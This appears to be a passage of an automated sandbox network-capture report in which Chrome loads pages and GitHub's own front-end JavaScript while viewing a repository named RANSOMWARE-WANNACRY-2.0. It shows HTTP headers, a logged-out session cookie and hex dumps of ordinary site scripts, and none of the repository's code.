                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 75 74 45 6c 65 6d 65 6e 74 3b 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 67 65 74 28 22 72 65 6d 6f 74 65 2d 69 6e 70 75 74 22 29 7c 7c 28 77 69 6e 64 6f 77 2e 52 65 6d 6f 74 65 49 6e 70 75 74 45 6c 65 6d 65 6e 74 3d 52 65 6d 6f 74 65 49 6e 70 75 74 45 6c 65 6d 65 6e 74 2c 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 64 65 66 69 6e 65 28 22 72 65 6d 6f 74 65 2d 69 6e 70 75 74 22 2c 52 65 6d 6f 74 65 49 6e 70 75 74 45 6c 65 6d 65 6e 74 29 29 7d 2c 39 38 31 30 35 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 6c 65 74 20 65 3d 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 7b 74 6f 70 3a 65 2e 74 6f 70 2b 77 69 6e 64 6f 77 2e 70 61 67 65
                                                                                      Data Ascii: utElement;window.customElements.get("remote-input")||(window.RemoteInputElement=RemoteInputElement,window.customElements.define("remote-input",RemoteInputElement))},98105:(t,e,n)=>{function i(t){let e=t.getBoundingClientRect();return{top:e.top+window.page
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 75 72 6e 3b 6f 3d 6f 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 7d 69 66 28 65 26 26 65 21 3d 3d 61 26 26 65 21 3d 3d 61 2e 64 65 66 61 75 6c 74 56 69 65 77 26 26 65 21 3d 3d 61 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 65 21 3d 3d 61 2e 62 6f 64 79 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 73 29 29 72 65 74 75 72 6e 3b 72 3d 65 2c 6e 3d 65 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 2c 69 3d 65 2e 73 63 72 6f 6c 6c 57 69 64 74 68 7d 65 6c 73 65 7b 76 61 72 20 68 2c 6d 3b 72 3d 6c 2c 6e 3d 4d 61 74 68 2e 6d 61 78 28 28 68 3d 61 2e 62 6f 64 79 29 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 2c 6c 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 2c 68 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 6c 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 6c 2e 63 6c 69
                                                                                      Data Ascii: urn;o=o.offsetParent}if(e&&e!==a&&e!==a.defaultView&&e!==a.documentElement&&e!==a.body){if(!(e instanceof s))return;r=e,n=e.scrollHeight,i=e.scrollWidth}else{var h,m;r=l,n=Math.max((h=a.body).scrollHeight,l.scrollHeight,h.offsetHeight,l.offsetHeight,l.cli
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 20 74 3d 69 3b 69 2e 63 6f 6e 74 61 69 6e 65 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 66 6f 63 75 73 2d 74 72 61 70 22 2c 22 73 75 73 70 65 6e 64 65 64 22 29 2c 69 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 61 62 6f 72 74 28 29 2c 6f 2e 70 75 73 68 28 74 29 7d 68 2e 73 69 67 6e 61 6c 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 62 6f 72 74 22 2c 28 29 3d 3e 7b 69 3d 76 6f 69 64 20 30 7d 29 2c 75 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 62 6f 72 74 22 2c 28 29 3d 3e 7b 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 66 6f 63 75 73 2d 74 72 61 70 22 29 3b 6c 65 74 20 6e 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 73 65 6e 74 69 6e 65 6c 22 29 3b 66
                                                                                      Data Ascii: t=i;i.container.setAttribute("data-focus-trap","suspended"),i.controller.abort(),o.push(t)}h.signal.addEventListener("abort",()=>{i=void 0}),u.addEventListener("abort",()=>{e.removeAttribute("data-focus-trap");let n=e.getElementsByClassName("sentinel");f


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      128192.168.2.1649839140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC903OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/spoofed_commit_check/2445abd45c99c3ad9611ebcacc6cfe28451c2c0d HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"75a11da44c802486bc6f65640aa48a73"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:28 UTC2934INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:28 UTC2INData Raw: 0a 0a
                                                                                      Data Ascii:


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      129192.168.2.1649826185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC678OUTGET /assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-8044b2e52146.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 11878
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 06 Mar 2024 21:55:06 GMT
                                                                                      ETag: 0x8DC3E2815A8A212
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Age: 1364678
                                                                                      X-Served-By: cache-iad-kiad7000177-IAD, cache-ewr18134-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 622, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 058874c3d869d3aaa065c07033148c8a216bec31
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 63 6f 64 65 2d 76 69 65 77 2d 73 68 61 72 65 64 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 66 69 6c 65 73 2d 73 65 61 72 63 68 5f 46 69 6c 65 52 65 73 75 6c 74 73 4c 69 73 74 5f 74 73 78 22 5d 2c 7b 31 33 32 37 35 3a 28 65 2c 72 2c 74 29 3d 3e 7b 74 2e 64 28 72 2c 7b 7a 3a 28 29 3d 3e 61 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 72 2c 7b 64 69 72 65 63 74 69 6f 6e 3a 74 3d 22 76 65 72 74 69 63 61 6c 22 2c 73 74 61 72 74 4d 61 72 67 69 6e 3a 61 3d 30 2c 65 6e 64 4d 61 72 67 69 6e 3a 6e 3d 30 2c 62 65
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_code-view-shared_components_files-search_FileResultsList_tsx"],{13275:(e,r,t)=>{t.d(r,{z:()=>a});function a(e,r,{direction:t="vertical",startMargin:a=0,endMargin:n=0,be
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6e 20 73 28 65 2c 72 29 7b 76 61 72 20 74 3d 65 2e 6c 65 6e 67 74 68 2c 6e 3d 72 2e 6c 65 6e 67 74 68 2c 69 3d 41 72 72 61 79 28 74 29 3b 69 66 28 21 74 7c 7c 21 6e 29 72 65 74 75 72 6e 20 69 3b 69 66 28 74 3d 3d 3d 6e 29 7b 66 6f 72 28 76 61 72 20 73 3d 30 3b 73 3c 74 3b 73 2b 2b 29 69 5b 73 5d 3d 73 3b 72 65 74 75 72 6e 20 69 7d 69 66 28 6e 3e 31 30 32 34 29 72 65 74 75 72 6e 20 69 3b 76 61 72 20 6f 3d 41 72 72 61 79 28 74 29 2c 63 3d 41 72 72 61 79 28 74 29 3b 6c 28 65 2c 72 2c 6f 2c 63 29 3b 66 6f 72 28 76 61 72 20 75 3d 21 31 2c 73 3d 74 2d 31 2c 64 3d 6e 2d 31 3b 73 3e 3d 30 3b 73 2d 2d 29 66 6f 72 28 3b 64 3e 3d 30 3b 64 2d 2d 29 69 66 28 6f 5b 73 5d 5b 64 5d 21 3d 3d 61 26 26 28 75 7c 7c 6f 5b 73 5d 5b 64 5d 3d 3d 3d 63 5b 73 5d 5b 64 5d 29 29 7b
                                                                                      Data Ascii: n s(e,r){var t=e.length,n=r.length,i=Array(t);if(!t||!n)return i;if(t===n){for(var s=0;s<t;s++)i[s]=s;return i}if(n>1024)return i;var o=Array(t),c=Array(t);l(e,r,o,c);for(var u=!1,s=t-1,d=n-1;s>=0;s--)for(;d>=0;d--)if(o[s][d]!==a&&(u||o[s][d]===c[s][d])){
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 33 29 2c 45 3d 74 28 39 37 30 31 31 29 2c 6b 3d 74 28 34 37 31 34 32 29 2c 53 3d 74 28 36 37 32 39 34 29 2c 4c 3d 74 28 32 38 31 31 34 29 2c 41 3d 74 28 31 35 32 30 35 29 3b 6c 65 74 20 46 3d 28 30 2c 41 2e 5a 29 28 6b 2e 47 73 29 3b 66 75 6e 63 74 69 6f 6e 20 4e 28 7b 64 61 74 61 3a 65 7d 29 7b 6c 65 74 7b 71 75 65 72 79 3a 72 2c 62 61 73 65 4c 69 73 74 3a 74 2c 73 74 61 72 74 54 69 6d 65 3a 61 7d 3d 65 2c 6e 3d 72 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 5c 5c 22 2c 22 22 29 2c 6c 3d 74 2e 66 69 6c 74 65 72 28 65 3d 3e 22 22 3d 3d 3d 6e 7c 7c 28 30 2c 6b 2e 43 44 29 28 6e 2c 65 29 26 26 46 28 6e 2c 65 29 3e 30 29 2e 73 6f 72 74 28 28 65 2c 72 29 3d 3e 46 28 6e 2c 72 29 2d 46 28 6e 2c 65 29 29 3b 72 65 74 75 72 6e 7b 71 75 65 72 79 3a 72 2c 6c 69 73 74 3a
                                                                                      Data Ascii: 3),E=t(97011),k=t(47142),S=t(67294),L=t(28114),A=t(15205);let F=(0,A.Z)(k.Gs);function N({data:e}){let{query:r,baseList:t,startTime:a}=e,n=r.replaceAll("\\",""),l=t.filter(e=>""===n||(0,k.CD)(n,e)&&F(n,e)>0).sort((e,r)=>F(n,r)-F(n,e));return{query:r,list:
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 73 3a 56 2c 63 6c 65 61 72 4d 61 74 63 68 65 73 3a 4b 7d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 2c 61 29 7b 6c 65 74 5b 6e 2c 6c 5d 3d 53 2e 75 73 65 53 74 61 74 65 28 29 2c 73 3d 53 2e 75 73 65 52 65 66 28 22 22 29 2c 6f 3d 53 2e 75 73 65 52 65 66 28 29 2c 7b 73 65 6e 64 53 74 61 74 73 3a 63 7d 3d 28 30 2c 69 2e 61 29 28 29 2c 75 3d 53 2e 75 73 65 52 65 66 28 21 31 29 2c 64 3d 53 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 28 29 3d 3e 7b 6c 65 74 20 65 3d 6e 65 77 20 4c 2e 56 28 74 2c 4e 29 3b 65 2e 6f 6e 6d 65 73 73 61 67 65 3d 28 7b 64 61 74 61 3a 65 7d 29 3d 3e 7b 75 2e 63 75 72 72 65 6e 74 3d 21 31 2c 6c 28 65 2e 6c 69 73 74 29 2c 73 2e 63 75 72 72 65 6e 74 3d 65 2e 71 75 65 72 79 2c 65 2e 73 74 61 72 74 54 69 6d 65 26 26 63 28 22 72 65 70 6f 73 69
                                                                                      Data Ascii: s:V,clearMatches:K}=function(e,r,t,a){let[n,l]=S.useState(),s=S.useRef(""),o=S.useRef(),{sendStats:c}=(0,i.a)(),u=S.useRef(!1),d=S.useCallback(()=>{let e=new L.V(t,N);e.onmessage=({data:e})=>{u.current=!1,l(e.list),s.current=e.query,e.startTime&&c("reposi
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2c 7b 73 78 3a 7b 6d 61 78 48 65 69 67 68 74 3a 65 73 3f 22 36 30 76 68 22 3a 22 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 22 2c 6f 76 65 72 66 6c 6f 77 59 3a 22 61 75 74 6f 22 2c 73 63 72 6f 6c 6c 62 61 72 47 75 74 74 65 72 3a 22 73 74 61 62 6c 65 22 2c 6d 61 78 57 69 64 74 68 3a 22 31 30 30 76 77 22 2c 22 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 22 3a 7b 6d 6c 3a 33 2c 6d 72 3a 32 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 42 3f 28 30 2c 61 2e 6a 73 78 29 28 77 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 64 61 6e 67 65 72 22 2c 73 78 3a 7b 6d 3a 33 7d 2c 63 68 69 6c 64 72 65 6e 3a 22 46 61 69 6c 65 64 20 74 6f 20 73 65 61 72 63 68 22 7d 29 3a 28 30 2c 61 2e 6a 73 78 73 29 28 79 2e 53 2c 7b 72 65 66 3a 65 63 2c 73 78 3a 7b 6f 76
                                                                                      Data Ascii: ,{sx:{maxHeight:es?"60vh":"100% !important",overflowY:"auto",scrollbarGutter:"stable",maxWidth:"100vw","@media (max-width: 768px)":{ml:3,mr:2}},children:B?(0,a.jsx)(w.Z,{variant:"danger",sx:{m:3},children:"Failed to search"}):(0,a.jsxs)(y.S,{ref:ec,sx:{ov
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6f 6e 4b 65 79 44 6f 77 6e 3a 65 3d 3e 7b 6c 65 74 7b 6b 65 79 3a 72 2c 73 68 69 66 74 4b 65 79 3a 74 2c 6d 65 74 61 4b 65 79 3a 61 2c 61 6c 74 4b 65 79 3a 6e 2c 63 74 72 6c 4b 65 79 3a 6c 7d 3d 65 3b 69 66 28 21 74 26 26 21 61 26 26 21 6e 29 7b 69 66 28 22 45 73 63 61 70 65 22 3d 3d 3d 72 29 52 3f 28 65 6c 28 22 46 49 4c 45 5f 54 52 45 45 2e 43 41 4e 43 45 4c 5f 53 45 41 52 43 48 22 29 2c 6a 28 22 22 29 2c 4b 28 29 29 3a 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 2e 62 6c 75 72 28 29 3b 65 6c 73 65 20 69 66 28 21 52 29 72 65 74 75 72 6e 3b 65 6c 73 65 20 69 66 28 22 45 6e 74 65 72 22 3d 3d 3d 72 29 65 64 26 26 58 3d 3d 3d 65 75 2e 6c 65 6e 67 74 68 3f 51 28 28
                                                                                      Data Ascii: onKeyDown:e=>{let{key:r,shiftKey:t,metaKey:a,altKey:n,ctrlKey:l}=e;if(!t&&!a&&!n){if("Escape"===r)R?(el("FILE_TREE.CANCEL_SEARCH"),j(""),K()):document.activeElement&&document.activeElement.blur();else if(!R)return;else if("Enter"===r)ed&&X===eu.length?Q((
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2e 60 3a 60 53 68 6f 77 69 6e 67 20 24 7b 65 7d 20 66 69 6c 65 73 2e 60 7d 2c 22 72 65 73 75 6c 74 73 2d 63 6f 75 6e 74 2d 73 74 61 74 75 73 22 29 7d 6c 65 74 20 24 3d 28 7b 61 63 74 69 76 65 3a 65 2c 66 6f 63 75 73 65 64 3a 72 2c 69 6e 64 65 78 3a 74 2c 6d 61 74 63 68 3a 6e 2c 71 75 65 72 79 3a 6c 2c 74 6f 3a 69 2c 69 73 44 69 72 65 63 74 6f 72 79 3a 73 2c 6f 6e 43 6c 69 63 6b 3a 6f 2c 6f 6e 52 65 6e 64 65 72 3a 75 2c 75 73 65 4f 76 65 72 6c 61 79 3a 66 2c 6c 69 73 74 52 65 66 3a 68 7d 29 3d 3e 7b 6c 65 74 20 6d 3d 28 30 2c 6b 2e 6d 37 29 28 6c 2c 6e 29 3b 75 3f 2e 28 29 3b 6c 65 74 20 70 3d 53 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 67 3d 73 3f 48 3a 42 3b 53 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 66 28 72 26 26 70 2e 63 75 72 72 65 6e 74
                                                                                      Data Ascii: .`:`Showing ${e} files.`},"results-count-status")}let $=({active:e,focused:r,index:t,match:n,query:l,to:i,isDirectory:s,onClick:o,onRender:u,useOverlay:f,listRef:h})=>{let m=(0,k.m7)(l,n);u?.();let p=S.useRef(null),g=s?H:B;S.useEffect(()=>{if(r&&p.current
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 67 74 68 29 63 6f 6e 74 69 6e 75 65 3b 6c 65 74 20 72 3d 65 2e 73 6c 69 63 65 28 69 2c 74 29 3b 72 26 26 6c 2e 70 75 73 68 28 71 28 72 29 29 2c 69 3d 74 2b 31 2c 6c 2e 70 75 73 68 28 28 30 2c 61 2e 6a 73 78 29 28 45 2e 5a 2c 7b 61 73 3a 22 6d 61 72 6b 22 2c 73 78 3a 7b 66 6f 6e 74 57 65 69 67 68 74 3a 22 62 6f 6c 64 22 2c 62 61 63 6b 67 72 6f 75 6e 64 3a 22 6e 6f 6e 65 22 2c 63 6f 6c 6f 72 3a 22 66 67 2e 64 65 66 61 75 6c 74 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 65 5b 74 5d 7d 2c 74 29 29 7d 72 65 74 75 72 6e 20 6c 2e 70 75 73 68 28 71 28 65 2e 73 6c 69 63 65 28 69 29 29 29 2c 28 30 2c 61 2e 6a 73 78 29 28 76 2e 5a 2c 7b 73 78 3a 74 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 61 2e 6a 73 78 73 29 28 61 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a
                                                                                      Data Ascii: gth)continue;let r=e.slice(i,t);r&&l.push(q(r)),i=t+1,l.push((0,a.jsx)(E.Z,{as:"mark",sx:{fontWeight:"bold",background:"none",color:"fg.default"},children:e[t]},t))}return l.push(q(e.slice(i))),(0,a.jsx)(v.Z,{sx:t,children:(0,a.jsxs)(a.Fragment,{children:
                                                                                      2024-03-23 14:47:28 UTC854INData Raw: 6a 73 78 29 28 63 2e 5a 2c 7b 61 75 74 6f 46 6f 63 75 73 3a 68 28 29 2c 72 65 66 3a 79 2c 76 61 6c 75 65 3a 43 2c 6f 6e 4b 65 79 44 6f 77 6e 3a 78 2c 6f 6e 43 68 61 6e 67 65 3a 65 3d 3e 7b 52 28 65 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 29 2c 70 28 29 2c 6a 2e 63 75 72 72 65 6e 74 28 65 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 29 7d 2c 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 2e 2e 2e 77 7d 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 47 6f 20 74 6f 20 66 69 6c 65 22 2c 22 61 72 69 61 2d 61 63 74 69 76 65 64 65 73 63 65 6e 64 61 6e 74 22 3a 65 2c 72 6f 6c 65 3a 73 3f 22 63 6f 6d 62 6f 62 6f 78 22 3a 76 6f 69 64 20 30 2c 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 3a 72 2c 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 3a 74 2c 22 61 72 69 61
                                                                                      Data Ascii: jsx)(c.Z,{autoFocus:h(),ref:y,value:C,onKeyDown:x,onChange:e=>{R(e.target.value),p(),j.current(e.target.value)},sx:{display:"flex",...w},"aria-label":"Go to file","aria-activedescendant":e,role:s?"combobox":void 0,"aria-controls":r,"aria-expanded":t,"aria


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      130192.168.2.1649844140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC1172OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: application/json
                                                                                      Accept: application/json
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      GitHub-Verified-Fetch: true
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC513INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"c7fbc4dad3e6b0fa653df5b7f48c07ec"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:28 UTC2935INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
